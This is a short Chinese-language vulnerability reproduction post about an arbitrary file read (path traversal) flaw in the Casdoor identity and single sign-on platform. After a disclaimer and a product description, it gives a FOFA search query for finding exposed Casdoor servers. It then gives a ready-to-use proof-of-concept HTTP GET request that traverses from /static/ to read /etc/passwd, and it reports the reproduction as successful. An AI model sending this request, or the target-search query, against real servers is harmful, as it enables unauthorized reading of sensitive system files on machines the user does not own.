Casdoor系统static任意文件读取漏洞

Casdoor系统static任意文件读取漏洞复现

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的，UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发，前后端分离，内置第三方应用登录服务。Casdoor 有四个核心概念，分别是 组织(Organization)，用户(User)，应用(Application) 和 提供商(Provider)。组织承载用户和应用，一个用户只能隶属于一个组织，但可以登录到自己组织的多个应用中；而提供商则代表了某种身份验证方式，例如电子邮件验证、短信验证、OAuth 验证等。

Casdoor系统 static 存在任意文件读取漏洞，攻击者可利用该漏洞获取服务器上的敏感文件。

0x03 影响平台

Casdoor系统

0x04 漏洞环境

FOFA语法： title=“Casdoor”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: casdoor_session_id=0a2f2dbe922f59ebd72dab8548430946
Upgrade-Insecure-Requests: 1

3.复现

成功响应，复现成功！！！